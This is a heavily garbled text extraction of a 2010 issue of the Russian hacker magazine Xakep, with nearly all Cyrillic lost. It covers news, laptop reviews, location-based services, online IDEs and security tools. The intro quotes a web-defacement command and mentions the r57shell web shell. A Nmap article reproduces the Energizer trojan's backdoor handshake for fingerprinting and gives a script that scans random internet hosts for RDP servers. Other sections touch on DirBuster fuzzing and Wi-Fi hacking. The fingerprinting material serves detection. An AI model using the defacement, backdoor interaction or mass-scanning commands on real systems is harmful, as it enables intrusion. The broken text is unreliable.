Вы находитесь на странице: 1из 148

.

60

x 06 () 2010

.
210
:

RING0- WINDOWS X64

06 (137) 2010

EARN
CASH
NOW!

WINDOWS

. 78

. 96

. 96

137

UBUNTU
ONLINE-


WINDOWS

OPENCART

-
. 54

INTRO
: , 17 ,
. , . , 1. 26
2010 - forum.anti-forum.ru ,
.
, web- www.upperlohi-online.ru CMS.

-,
.
-
,
,
.
r57shell,

. web- www.
upper-lohi-online.ru !
,
,
:
$ echo hucked buy megamozd! Gritz to anti-forum.ru kru! > /www/public_html/index.php

,

9 12 2010 .

:



272 273 .

.
,
,
1993
50 000 3
.
,
.
:
1.
,
.
2. ,
,

ip-, / ,
,
socks/vpn, .
3. : - ,
localhost - DVL
. , ,
.
nikitozz, . .

CONTENT
MegaNews

004

078

082

086

FERRUM
018

PC_ZONE
022
026

LBS-, GPS?
,

Nmap?

Ubuntu


Linux

090

poker room

096

Earn cash now!

-:

Windows:

030

100

online

034

106

036

Windows

SYN/ACK

Internet Explorer 9

Web-Services: -

C++

114

040

Easy-Hack

116

044

120

050

054

Opencart

125

060

064

066

070

X-Tools

NevoSoft

- Opencart

ring0-shellcode Windows x64


Ideco Control Server

iptables, ipfw pf

130

torrents.ru

132

PSYCHO:

138

FAQ UNITED

142

072

144

WWW2

BumpTop -

vs

vs

FAQ

8.5

web-

054

Opencart
- Opencart

090

poker room
-:

026

Nmap?

116


Ideco Control Server

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>




> Gameland TV

>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -

>

(korenfeld@gameland.ru)
>

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )

>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

Chatroulette! ( chatroulette.com),
.
,
( :).
2009 , 2010 - New York Times, Forbes New York
Magazine; South Park. , , -
, . - ,
hatroulette .
,
, , Skype, ICQ ,
, .
,
. , , ,
Chatroulette .


WIKIPEDIA
1
.

-
IPAD
McAfee DAT 5958, , ,
McAfee, Windows XP SP3.
, svchost.exe (Services) W32/
Wecorl.a, , .
, McAfee

, , ,
. epic fail! McAfee
(vil.nai.com/vil/5958_false.htm),
,
, , .
.

004

, iPad -
1200 . , ,
:
aMac.ru! , (
Apple) ,
. , , AppStore
. , Apple
,
AppStore, .
iPad, iTunes. ,
GiftCard, , (
). , jailbrake , George Hotz ( George Hotz)
iPad. Windows
95 Bosch.
X 06 /137/ 10

MEGANEWS

IPHONE

iPhone 4G ... Apple.


Gizmodo
, - Apple ,

, . Gizmodo

, ,
,
Gourmet Haus Staudt,
$5000!
, (1-
- ). -

,


Apple . ,
, . (
) ,
iPhone.
, , , .

, iPhone
3GS, , ,
.
, .
, iPhone - ,
,
( Apple

iPhone), ...
Apple
, c,
,
. ,
Gizmodo . Gizmodo

,
.
: ,

. SIM-
Micro-SIM.
, ,
960 640 .
, iPhone
3 ,
16%.
, ,
.
,
: ! Apple
. iTunes
iPhone.
iPhone ,
Apple.
Gizmodo ,
-
Apple. Apple .

, ,
PR- .

- :
- 10%.

WEBMONEY .
WebMoney .

-
,
.

+
,
WebMoney, , . ,

, .
,
,
.

ORACLE
, Sun Microsystems - ,

-.
- $7,4 , Sun
Oracle. , - .
, ,

006

, Java (
!), ,
Oracle, 2-
.
, ,
Sun TechDays, , Sun.
, ,
,

.
X 06 /137/ 10

MEGANEWS

FACEBOOK

Facebook
, 2010-
,
,
. Facebook 400 -

.
,
Facebook SMS. , , ,
MySpace , . , ,
68 ,
. ,
Facebook ,
, .
Facebook . , f8
OpenGraph, ,
Facebook. ,
.
Facebook Connect (
).
Facebook -

, Facebook Connect, (
24 ). , !

BLU-RAY DISC ASSOCIATION ,


BLU-RAY 100 128 ,
100 .

GOOGLE?

, Google,
, . , Google
. ,

, , , , .

.
The New York Times , ,
,
Google
Gaia, .
Google
, ,
.

, ,

GMail, ,
,
IP-. :
, , ;

, . Google
.


,
, ,

Twitter. ,
, 2006 ,

. ,
,
.
20 -

008

( plain-!),
,
. ,
Twitter , , , Twitter
, -
.
,

,
.
X 06 /137/ 10

MEGANEWS

, , , , ,
, . ,
:
.torrent-,
, . ,
, , , ,
www.icpp-online.com.
, , , ICPP
. RIAA,
MPAA The Copyright Alliance,
. , ,
, - ,
,
5 $250000. ,
, $400.
, ,
. ,
.

TIOBE
. 1- C, JAVA 2- ,
C++ 3- .

FOR THE HORD!

Creative,
Sound Blaster World of Warcraft Headset Sound
Blaster World of Warcraft Wireless Headset ( ). ,
MMORPG World of
Warcraft. WoW,

16 . : ( THX TruStudio PC) ,

Silencer, VoiceFX, , World of Warcraft. , .
6899 .
9299 . .

ICQ !
AOL
ICQ; Digital Sky
Technologies ( Mail.ru),
( - Rambler Media)
Tencent (
QQ,
). ,

AOL ,
. America Online

010

1998 ICQ 400 . 28


DST ,
- AOL
ICQ $187,5 . 18
$10 :)

X 06 /137/ 10

11

MEGANEWS




HP All-in-One 200.
,
13
, tower-. All-in-One 200
HD- 21.5 . 30
;
. ,
All-in-One 200 ,
Intel Pentium E5400 c 2.7 , 4 DDR3,
Intel GMA X4500HD 500 .
- , 802.11 b/g/n -.
.
699 ,
.

:

100 . WINDOWS 7.

,
Paramount
Digital Entertainment Seagate
, FreeAgent Go
. ,
, . Paramount Pictures
21- , Star Trek (2009).
20, 10-15 , Seagate . 500- 50 ,
DVD- DRM-.
, - Seagate, ,
,

. 500 $140.

- . .
, , - GameStation. - :
- 1 4 2010 ..,
, ,
, . ,
5 ()
gamesation.
co.uk . , , ,
,
.

. , , 5 .
,
88% , 7500 .

012

X 06 /137/ 10

013
13

MEGANEWS


. .
, ,
IT-,
. , 2009
: , , , ,
.
, .
, , , , .
, , ,
,
.
2010 1700
,
, ,
, .

, 5
Facebook iDefense.
(
)
Kirllos, Facebook
: $25-45 1000
/ ( ).

,
1,5 . . iDefense

,
. ,

Kirllos
/.
,
. ,
, ,

ZeuS. iDefense ,

700
( , $17,5
).

YOUTUBE 5 .



Sony
,
3.5,

2011 .
30
3,5
Sony 1981
.
720 (9 ),
1440
1,4 (18 ),

014

. Sony
70% ,

, ,
,
.
Sony ,
.
, , !

?..

X 06 /137/ 10

, ICANN
(Internet Corporation for Assigned
Names and Numbers) , .
.
,
,

,

.
,
15


.
12

.

,

. . 21 ,
.
9936 , 5%
.
16 ,

.

...

!
Adobe Apple , Flash.

Flash, .
, Adobe
Flash iPhone. Adobe Creative Suite 5
Flash- iPhone
, .
Apple
, Android Google. Android ( Android-,
)
, iPhone, .

CANONICAL, UBUNTU- 12
. , 2008 8 .

X 06 /137/ 10

015

GIGABYTE
GA-MA770TUD3P
Dell Studio
1515

FERRUM

Samsung
R580
HP Pavilion
dv6t

Acer Aspire
5740G


HP Pavilion
dv6t

Dell Studio
1515

ASUS
M4A78T-E

P Pavilion
dv6t

ASUS
M4A78T-E

, ,
,
, . ,
.
.

.
3DMark`06 PCMark Vantage.
, WinRAR, + ,
SuperPi,
( ). ,
: Resident Evil 5 Tom Clancys
H.A.W.X. , .
Battery Eater Pro v2.70. Balanced ().
, PCMark ( )
,
( ),
. PCMark Vantage , ,
, .

, - ,
, ,
. ,
, . ,
, -
,
.
, ,
. ,
, , , ,
, ,
, .

016

BATTERYEATER
Toshiba Qosmio X500
Samsung R580
MSI GT729
HP Pavilion dv6
Dell Studio 1515
Acer Aspire 5740G

Palit
GeForce GT
240 Sonic
0

20

40

60

80

100

120

(-)

MSI GT729,

TOM CLANCYS H.A.W.X.


Toshiba Qosmio X500
Samsung R580
MSI GT729
HP Pavilion dv6
Dell Studio 1515
Acer Aspire 5740G

Palit
GeForce GT
240 Sonic
0

10

20

30

40

50

60

70

80

fps (-)

fps HP Pavilion dv6,


X 06 /137/ 10

SUPERPI

WINRAR

Acer Aspire
Toshiba Qosmio X500
5740G

Toshiba Qosmio X500

Palit GeForce
GT 220 Sonic
MSI GT729
Palit
HP Pavilion dv6
GeForce GT
Dell Studio 1515
240 Sonic
Acer Aspire 5740G
Samsung R580

10

20

30

40

Samsung R580
MSI GT729

HP Pavilion dv6
Dell Studio 1515
Acer Aspire 5740G
50

60

70

80

Palit
GeForce GT
240 Sonic

90 100

fps (-)

500

1000

1500

2000

2500

Dell Studio
1515

/ (-)

,
, SuperPi ,

WinRAR CPU
Toshiba Qosmio X500, Intel Core i7

ACER ASPIRE
5740G

DELL STUDIO
1515

25300 .

25000 .

, -,
, ,
. !
, .
,
, ,
.

,
.
: eSATA, HDMI
mini FireWire. ,
.
, 100 .
web- ,
.

, : 2.1, INTEL CORE I3-330M


, : 3
: 15.6, 1366X768
, : 512, ATI MOBILITY RADEON HD 5470
, : 250
: DVD SUPER MULTI DL
: , GIGABIT LAN, BLUETOOTH, WI-FI
802.11B/G/N
: 4X USB, 1X HDMI, VGA, SD, MMC, XD, MS, MS PRO, S/
PDIF, MIC, EAR
, : 38325026~37
, : 2.8

DVI HDMI .

D-Sub. ,
.
X 06 /137/ 10

, : 2, INTEL MOBILE CORE 2 DUO T6400


, : 2
: 15.6, 1280X800
, : 512, ATI MOBILITY RADEON HD 4570
, : 150
: DVD SUPER MULTI
: GIGABIT LAN, BLUETOOTH, WI-FI 802.11B/G/N
: 2X USB, VGA, 1X ESATA, 1X HDMI, 1X MINI FIREWIRE,
EXPRESSCARD, SD, MMC, MS, MS PRO, MIC, EAR
: WINDOWS VISTA HOME BASIC
, : 37125230
, : 2.7

. , , USB .
HDMI DVI.

017

GIGABYTE
GA-MA770TUD3P
Dell Studio
1515

FERRUM

Samsung
R580

30000 .

HP PAVILION
dv6t
:

, : 1.6, INTEL CORE I7-Q720M


, : 4
: 15.6, 1366?768
, : 1024, NVIDIA GEFORCE GT 230M
, : 250
: DVD SUPER MULTI DL
: GIGABITLAN, BLUETOOTH, WI-FI 802.11 B/G/N, IRDA
: 4X USB, VGA, 1X HDMI, 1X ESATA ( USB),
1X MINI FIREWIRE, SD, MS, MS PRO, MMC, XD, MIC, EAR, , EXPRESSCARD
: WINDOWS 7 HOME ADVANCED
, : 258X358X37
, : 3

Acer Aspire
5740G

MSI
GT729

, : 2.53, INTEL CORE 2 DUO P9500


, : 4
: 17, 1680X1050
, : 1024, ATI MOBILITY RADEON HD 4850
, : 300
: BD-ROM
: , GIGABIT LAN, BLUETOOTH, WI-FI 802.11
B/G/N
: 3X USB, 1X MINI FIREWIRE, 1X ESATA, 1X HDMI, VGA, SD,
PCMCIA, MIC, EAR
: N\A
, : 39527826.5~35
, : 3.2

. , :
, ,
, .
, . ,
, ,
,
. , .

GT , . : -
,
, . ( ),
( ).
Blu-ray , . ,
.

. , .
HDMI .

, , , .
. , PCMark
Vantage , .

018

X 06 /137/ 10

Acer Aspire
5740G

SAMSUNG
R580

34000 .

, : 2.53, INTEL CORE I5-540M


, : 4
: 15.6, 1366X768
, : 1024, NVIDIA GEFORCE GT 330M
, : 500
: DVD SUPER MULTI DL
: GIGABITLAN, BLUETOOTH, WI-FI 802.11B/G/N
: 4X USB, USB SLEEP-AND-CHARGE, 1X HDMI, 1X ESATA
( USB), SD, SDHC, MMC, VGA, EXPRESSCARD, MIC, EAR,
: WINDOWS 7 PROFESSIONAL
, : 358X264X28.6~36.5
, : 2.7

,
, .
, . ,
, web-, .
USB-
.


.
HDMI.

,
MSI GT729,
,
Blu-ray.

X 06 /137/ 10

Samsun
R580
HP Pavilion
dv6t

TOSHIBA QOSMIO
500
:

107500 .

, : 1.73, INTEL CORE I7-Q820


, : 4
: 18.4, 1920X1080
, : 1024, NVIDIA GEFORCE GTS 250M
, : 2X320
: DVD SUPER MULTI
: LAN, BLUETOOTH, WI-FI 802.11B/G/N
: 3X USB, 1X ESATA, 1X HDMI, 1X MINI FIREWIRE,
EXPRESSCARD, SD, MS, XD, VGA, MIC, EAR
: WINDOWS 7 ULTIMATE
, : 442.6294.241.5
, : 4.6

18,4
! , ,
, ,
.
:
, . , ,
: .

.
.
,
PCMark Vantage.

,

. Samsung R580

. ,

Toshiba Qosmio 500


,

( ),
. z

019

PC_ZONE
Step step@glc.ru

LBS-,

GPS?
,

GPS , .

,
.


GPS
,
,
.

.
GPS
.

3G,

020

.
online,

Location Based
. ,
GPS.

GOOGLE


. , Google .

,
,
www.google.com/latitude.
?
Google, ,
, . ,
,
, . ,
- GPS.
X 06 /137/ 10

Twitter'
,

,
,

! LBS- GPS,
,
, Wi-Fi
( ).
,
. ,
, . ,
.
, ,
, , ,
. Google .

.
, -
, SMS!
, Twitter' , ,
.
.
SMS- , .
:
; (, ),
.
, .

,
.
,
, ,

, .

, ,
Gtalk
/ .

2.0

, , Google
,
X 06 /137/ 10


.
,
: ,

. ,
Gowalla
(gowalla.com) Foursquare (foursquare.
com), ,
.

,

, .
, ,
.


.
, . ,
. , . check in :).

.
,
. ,
. , ,
Gmail', Twitter'
, . ,
,
GPS , ,

.

. - ,
,
. . Foursquare
:
, 50%
.. , , , .

,

Wi-Fi
iPhone, Android,
BlackBerry . , Windows
Mobile Symbian .
AlterGeo (altergeo.ru).

(WiFi+GSM+WiMax+IP),
, ,

. , AlterGeo
Google, . OpenStreetMaps,

.

, ,
, .
.
: ,
, ,
, , LBS-.

, -

GPS?
,
, .
CellID ( CID) , .
, CID .
,
.
, , .
, Google
. , .
? , .
, , , CellID ( GPS).
, ,
GPS (PDF- ).

021

PC_ZONE


Foursquare

Foursqure
..
. (http://mobile.yandex.ru/maps),
, .
, , . ,
.
.

40 /, , ,
. , , -
,
.
- ..
. ?
! ,
. . ,
,
- . ,
? ,
, ,
. . Windows
Mobile, Symbian, Java, Android Blackberry
130 , .
, , ,
, - . , , :
GPRS-,
.

Waze

wiki-,
GPS- ( ,
GPS-).
,
.
,
. Waze (www.waze.com)
,
. , , :
.
Waze
. ,
. .
;
( - OpenStreetMap). .
, ,
, - .
, ,
. Android,
iPhone, Windows Mobile Symbian. ,
.
, .
,
, - ,
.

, , .
! GPS-
( ), -

security-

WAZE

,
, .
,
. OpenStreetMap (www.
openstreetmap.org) -

022

X 06 /137/ 10

PC_ZONE
STEP TWITTER.COM/STEPAH

INFO

info

FourSquare,

.

, ,
, ,

fourwhere.
com.

FourSquare.
Yahoo



Foursquare
$100 .

HTTP://WWW
links
,
.
-


.
: itag.com,
wavesecure.com.

024


Google


, .
,
, .
GPS-, .
Google,
Sky Map for Android (www.
google.com/sky/skymap). .
Android.
,
, GPS,
, ,
, ,
. GPS

,
.
,
, ,
,
. ,
,
,
, ! ? ,
,
Sky Map ! ,
, .
(
), ,

,
. :)

, .
,
. , , ! , . ,
Android (1.5 ),
.

GPS


,
. 3rdEye.
RPG
: ,
, .
:
( GPS, ), ,
. :
,
. .
:).
.
(
) ,
. ,
GPS- .
,
: GPS-
.
,
, , ,
. , www.geocaching.com www.
geocaching.su. z
X 06 /137/ 10

AdWords:

10

, Google . -
1000 , ,
. .
? AdWords :
. , , ,
.

01


,
. /
/ :
.
,

,
/
3 ,
,
.
,
.

02



. ,
,

.

Google, AdWords

,


.

03

,
(quality

score),
:
CTR , ,
.. 3 ,
,
.
,

.
.

04



.


. AdWords

,

.
CTR
,
, ,
.

05



,
. Google

.
, :
, , .

.
: [].
, ,
,
,
.

06


,
, .

, , -,
, -,
.
, CTR
. ,
,
.

07



-,



, CTR.
, , ,
, data recovery,
-
.

08


,
.

,
,

. ,
,

, .

09

Google
Analytics
,
,

,
.

10

AdWords



AdWords.

,

.
,
AdWords
AdWords, Youtube
,
AdWords : +7 495 780 0022.

PC_ZONE
Step step@glc.ru

Nmap?

Nmap ][ , -,
. Nmap ,
. :
, ,
. .


, ,
,
,

,
changelog'.

.
NSE-

.

.
,
. -
. , ,
- ,

026

,
,
. ?

FINGERPRINTING

, ,
, ,
, , .
.
, Nmap? .

fingerprinting',


( Nmap

probe). WWW, .
,
.
, .
,
Energizer (
Meganews ). ,
-
,
Wayback Machine (web.archive.
org).
. ( ,
- ),
. www.symantec.
com/connect/blogs/trojan-found-usb-batteryX 06 /137/ 10

charger-software
,
:
7777 ;
,
, XOR- 0xE5
, ;
( ,
, ..) CLSID ( {XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXXXXXX});
4 ,
.
"{E2AC5089-382043fe-8A4D-A7028FAD8C28}" , . , YES, ,
, XOR' 0xE5. ,
,

Nmap

!
. , ,
( ), ( 7777) (YES);
.

? YES!

Symantec

NSE- Nmap

7777 .
netcat ( www.
securityfocus.com/tools/13
Windows).
XOR' ,
.
,

.
#include <stdio.h>
int main(int argc, char *argv[])
{
int c;
while((c = getchar()) != EOF)
printf("%c", c ^ 0xE5);
return 0;
}

: ,
"XOR 0xE5"
, ,
:

NSE
Lua , Nmap
,
. %nmap%/nselib.
, , , DNS,
:
backdoor ;
bin ;
datafiles Nmap (, nmapprotocols );
default ;
dns DNS;
http HTTP;
msrpc MSRPC;
mysql MySQL;
netbios NetBIOS-;
nmap ;
packer RAW-;
proxy ;
shortport ;
smb SMB-;
sss1/ssh2 SSH.
require.

X 06 /137/ 10

$ gcc -o test test.c


$ echo "this is a test" | ./test |
hexdump -C
00000000 91 8d 8c 96 c5 8c
96 c5 84 c5 91 80 96 91 ef
|....A..A.A....i|

,
0xEF,
.
, .
echo "-n", , "-e",
escape- "\x00",
:
$ echo -ne "this is a test\x00" |
./test | hexdump -C
00000000 91 8d 8c 96 c5 8c
96 c5 84 c5 91 80 96 91 e5
|....A..A.A....a|

. "{E2AC5089-3820-43fe8A4D-A7028FAD8C28}",
(38 + 1 -

027

PC_ZONE

NSE
= 39 ,
27):

WARNING

info


.




.




.

DVD
dvd


Nmap,

probe'.

028

echo -ne "\x27\x00\x00\x00{E2AC5089-382043fe-8A4D-A7028FAD8C28}\x00"

, .
netcat' 7777
:
$ echo -ne "\x27\x00\x00\x00{E2AC5089-382043fe-8A4D-A7028FAD8C28}\x00" |
./test | #
ncat 192.168.1.123 7777 | #
./test #
:
YES

! YES , ! , fingerprinting
.

PROBE NMAP

,
,
Nmap'. ,
nmap-service-probes. c:\
program files\nmap (/usr/share/nmap /usr/local/share/
nmap ).
,
probe' . , netcat,
,
:
# Energizer
trojan
Probe TCP Energizer q|\xC2\xE5\xE5\xE5\x9E\
xA0\xD7\xA4\xA6\xD0\xD5\xDD\xDC\xC8\xD6\xDD\
xD7\xD5\xC8\xD1\xD6\x83\x80\xC8\xDD\xA4\xD1\
xA1\xC8\xA4\xD2\xD5\xD7\xDD\xA3\xA4\xA1\xDD\
xA6\xD7\xDD\x98\xE5|
rarity 8
ports 7777
match energizer m|^\xbc\xa0\xb6$| p/
Energizer backdoor/ o/Windows/
i/**BACKDOOR**/

Zenmap
,

: fingerprinting . fingerprinting-
Probe, "q|" "|"
. rarity . Ports , .
match Perl-
, Nmap. Nmap
7777 ,
Netcat'.
YES,
. :
$ nmap -sV -p7777 192.168.1.2
Starting Nmap 5.30BETA1 ( http://nmap.org )
Nmap scan report for 192.168.1.2
Host is up (0.00024s latency).
PORT
STATE SERVICE VERSION
7777/tcp open energizer Energizer
backdoor (**BACKDOOR**)
Service Info: OS: Windows

, , Nmap . ,

Nmap.
, . -
Nmap,
.

NSE ?

, ? Nmap Scripting Engine (NSE),


4.21 ,
6 .
, Nmap
, NSE-.
, (5.30BETA1) 37 : http-vmware-pathvuln, VMware; mysql-empty-password,

, ..
Nmap 117, .
X 06 /137/ 10

INFO

info

Nmap
,

. , Energizer,

. ,
,
, ,
.
, NSE
Nmap, .
Lua (www.lua.ru). , , NSE Python (
),
, , . , Lua, Python,
( ); Nmap.

NMAP

NSE-
.
.
description ;
categories ;
author ;
license ;
dependencies ;
port/host rules ;
action , .
Nmap nmap.org/
book/nse.html,
. .
-,
RDP-. RPD- Nmap.
NSE-,
. Lua:
description = [[ RDP Servers seachtool ]]
author = "X Group"
license = "Same as Nmap--See http://nmap.
X 06 /137/ 10

Nmap
org/book/man-legal.html"
categories = {"discovery"}
require "shortport"
portrule = shortport.port_or_service(3389,
"ms-term-serv")
action = function(host, port)
file = io.open ("ip_with_rdp.
txt","a+")
file:write(host.ip.."\n")
file:flash()
file:close()
end

. NSE- "discovery",
, .
require NSE-
.
.
(portrule),
, ,
(hostrule).
, true false. , ,
action, . portrule
port_or_service ,
3389 , ms-term-serv.
, ,
. Nmap
RDP- 3389 ,
IP- .
(, rpdlist.nse)
scripts. ,

lua, , Notepad++,
. ,
"--script" "-sC":
nmap -iR 0 -n -PS 3389 -p T:3389
--script=rpdlist.nse

RPD -.
MSRPC,

.
, . NSE nmap.org/book/nse.html,
Nmap ..z

Nmap,
:
,
?.
scanme.
nmap.org.

.
,
,
nmap
"--script-updatedb":
nmap --scriptupdatedb

Nmap'


.

ncat,


nc.

TCP,
UDP,

HTTP/CONNECT
SOCKS.



ndiff.

nping
,

.

029

PC_ZONE
Step step@glc.ru


, - -
. ,
,
. .

.
, -
-
.
,
. ,

IDE.

030


Ctrl-F7,
.
, .
:
cmpe150-1.cmpe.boun.edu.tr/phpccompiler/
login.php,
Internet Explorer. C++.
?

++,
. , Comeau C/C++ ,
-
(www.comeaucomputing.com/tryitout).

, Comeau,
,
.
, Comeau X 06 /137/ 10


exe-

Hex- Ajax

C++0x
(
++),
Visual Studio 2010.
-
,
ideone (ideone.com) 40 .
/C++
Java, C#, Pascal, Visual Basic .NET,
, .
: 10
, 5 , 256
. ,
. ,
codepad (codepad.org).

asm-

HEX PE-

,
. ? , HEX-
-

,
, .
HexPaste (hexpaste.com)
, : !.
, HEX-

? .

(, hexpaste.com/WvwX04eV),
- .

(). AJAX', , , .
,
PE-.
PE-,
,
,
exe .
proview phpp (pvdasm.reverseengineering.net/PVPHP.php)
, / (, , ,
API- ) ..

, proview phpp
.
,
, (SoftICE,
IDA, W32Dasm, Ollydbg). , ,

100 .
, Pym's
online disassembler (pyms86.appspot.com),
Google App Engine.
, ,
HEX-. 64- ,
Python- Pym (code.google.com/p/
pymsasid), pefile (code.google.com/p/pefile)
networkx (networkx.lanl.gov),
. ,
, .

, , .
Amy Editor (www.amyeditor.com). ,
.
: C, Java, Javascript,
PHP, Python, Ruby on rails, Ruby, Texy, HTML/
XML-. /,
X 06 /137/ 10

031

PC_ZONE

Python

Notepad++,

( , Python),
,
.
. ,
( ).
:
Bespin Mozilla (bespin.mozillalabs.com)
- (HTML/JavaScript);
CodeMirror (marijn.haverbeke.nl/codemirror) JavaScript
, : JavaScript, XML/HTML, CSS, Python, Lua, Ruby, SQL;
Ymacs (www.ymacs.org) Emacs- ,
Ajax.
. ,
, , Kodingen.

Visual Studio , , IntelliSense, ASP.NET,


PHP, Ajax, WPF !
C#/.NET (3.5), PHP (5.1), JavaScript, HTML CSS.
C#
Microsoft: ASP.NET, WCF, Silverlight WPF.
SQL Server 2005 Amazon SimpleDB.
, . ASP.NET SQL Server, coderun . , ? -, coderun
.NET ,
. ,
-. , watch', ,
callstack .
IDE . , , coderun .
,
.

IDE

Kodingen,
, .
,
, , !
IDE , !

, .
.
colaboration ,
: svn, git, mercirual! FTP .
Kodingen.
( , ). - -,
SSH! !

VISUAL STUDIO

,
Perl/Python/PHP , .
, , C#? - -, Microsoft?
! Visual Studio
, coderun (www.
coderun.com). .

032

,
, - , XML-,
, ,
WWW2 Pastie (pastie.org). ,
(, C++ Python). ,
,
. 38
, -
. ,
. Ruby, TextMate. Pastie
, . Snipplr
.
, .


, , RegexBuddy.
. , , .
- RegExr (www.
gskinner.com/RegExr), Flex-.
X 06 /137/ 10

Emacs
? Flex'
.

, .
, .
,
. ,
,
. ,
,
, -
.
,
RegExr'.

. ,
,
, ,

. , www.
regexlib.com.

, , IDE



, .

Visual Studio vs. coderun

Bespin Kodingen



INFO
, .
,
,
Teamer' (www.teamer.ru).
.
, ! :) z

info
Python,
Silverlight,
Try Python
(www.trypython.org).
Utility
Mill (utilitymill.com),
Python-

-.

FTP-
.

net2ftp (www.
net2ftp.com).
PHP
IDE
phpAnyware
(phpanywhere.net).

FTP,

.

X 06 /137/ 10

033

PC_ZONE
STEP TWITTER.COM/STEPAH



Internet Explorer


IE
. Internet Explorer Platform Preview (ie.
microsoft.com/testdrive),
, .
Direct2D
GPU.
JavaScript.
,
,
: CSS3, , SVG,
HTML5.


:). , ,
,
.
,
Javascript
.
,
. , ,
.
, .

. IE9 c JavaScript.
Chakra.
,
. SunSpider
, IE9

034

Internet Explorer,
,
. ! :)
IE
, W3C
Microsoft.
Internet Explorer,
.
IE8.
IE , Chrome Opera.
: ,
,
.
, ,
SunSpider,
.

ACID

ACID3, IE9
. . ACID 2,
ACID3 ,
.
,
,
. , ACID3
,
, - . IE9 ACID3 100%?
. .
IE9,
, -
, ,
,
,
.
IE8, CSS
8000 .


, . ,
, ,

. , . ,
,
,
.
IE6. , ? :
, , IE6.
, Chrome,
Internet Explorer
:). ,

6- IE. , Internet
Explorer 9 Windows XP;
. Windows
DEP ASLR.
Direct2d, .


- IE Microsoft
, . ,
, , .
: ,
Network Monitoring .
, Fiddler (www.fiddler2.com),
.
network-, ,
.
. ?
, .z
X 06 /137/ 10

JOIN US!
group.xakep.ru
-

vkontakte.ru/club10933209

udalite.livejournal.com
nikitozz

www.twitter.com/stepah
Step

www.ring0cup.ru
-

facebook.com gid=326597299563
Facebook

PC_ZONE
Step step@glc.ru

Windows

- Linux .
, ,
.

. -
. !

, Microsoft
.
,
?
.

, ,

036

Linux.

, ,

. ,
, -
.

,
. , !
,

( ),
, ,
X 06 /137/ 10

, Ninite


,

. :
, ,
.
, , /
, PDF,
, , Java/.
NET Framework/Flash, .
! :)
,
Dailysoft ][,
:
? ,
.
, -
www.ninite.com.
. ? .


,
: , ,
..

Get Installer.

,
.

. , , . , , ? !
, , , ,
, offline-
X 06 /137/ 10


allmyapps

,
.

- Ninite
.
, ,
-
.
, www.allmyapps.
com. Ninite,


( ).

,
Allmyapps
,
. ,

.
ZeuAPP (blog.zeusoft.net/
zeuapp),
.
,


,
. ! .
Windows 7, : !. , Windows
Update , . ,
.
?
DriverMax (www.innovative-sol.com/drivermax).
.

, . ,
,
. Drivermax
. . , DriverMax , Device
Doctor (www.devicedoctor.com).

037

PC_ZONE

security-

- Google
- Google Chrome, :
- -,
, , ,
. -
pack.google.com, , , ,
Google. Google Update omaha.
code.google.com/p/omaha. ,
, ,

, ,
- Linux.

DVD
dvd


(
Dailsoft),
,

038

. , Download
, ,
. ,
: .
. -

, ZeuAPP .

.

Secunia
Personal Software Inspector.

,
.
(
Secunia ) , ,
. .
, ,
- ,
.
(Adobe Flash Player,
QuickTime, Sun Java ..),
(, Skype). ,
, ActiveX- ,
Secunia PSI .

,
, Adobe Reader'
, .
,
, . , , ,
Windows-
.
,
.
security- Secunia.
, , -

, Magic UnInstall
X 06 /137/ 10

HTTPS- , , .
,
,
. Secunia . RSS-
Java,
PSI
. -
, , security. ,
PSI Secunia System
Score.
86%. ?

-?

,
- ,
. ,

. , Secunia PSI
,
,
-? ?
fileforum.betanews.com
www.filehippo.com. ,
FileHippo ,
,
, . ,
FileHippo.com Update Checker, ,
Secunia, . ...

- , . ,
FileHippo.com Update Checker PSI , .
, ? :)

exe ,

. , :
,
. ? Ashampoo
Magical UnInstall
. . ,

,
,
ReInstaller. Magical UnInstall
, .

Linux? ,
. , , , , -
apt-get .
Microsoft? .
.
Google Code, SourceForge , - .
: ,
, ? ,
,
Linux.z

INFO

info





. SUMo (www.
kcsoftwares.com)
Appupdater (www.
nabber.org/projects/
appupdater).


apt-get

win-get (windows-get.
sourceforge.net). Pascal'

, , ,

.

: Appsnap,
Appupdater

GetIt (www.
puchisoft.com/GetIt).

,
: , . ,

, :). , ,
, ,
Microsoft , .
. ! , , ,
, . , -
.
,
,

..
, Ashampoo Magical UnInstall (www.ashampoo.
com). ?
. ,
setup.exe, install.
X 06 /137/ 10

039


GreenDog agrrrdog@gmail.com

Easy Hack
1

: -
apach 20

:

. , CMS-, -
,
. , ,
( ) site, inurl, filetype ..,
, . .
URL- DirBuster, OWASP.
owasp.org/index.php/Category:OWASP_DirBuster_Project

Java-
( 6000 )! 300
.
:
1. , ;
2. ;
3. HTTP-;
4. HTTP-;
5. URL fuzzing;
6. , .

, .
,
. URL fuzzing. ,
, URL , {dir}.
:
/show.php?p={dir}.html

:
, .
, .
,
, , .
,
, , . . , WiFi-
, aux. ,
,

040

{dir} .
, .
(1.0rc1) , (0.12). .
, , GUI ,
. .
, (. ),
DirBuster ,
, .

. .
:
habrahabr.ru/blogs/modding/46483/

d-link, ,
. , .
. WiFi, , ,
, .
USB WiFi- (
). , 500 .
, , USB-, . USB
X 06 /137/ 10

5 , , , .
.
WiFi-, +5 dBi. , . :
korolshop.narod.ru/WiFi/wifi.htm

. WiFi--

, .
forum.antichat.ru/showthread.php?t=57249

: BackTrack
VMware, WiFi- ,
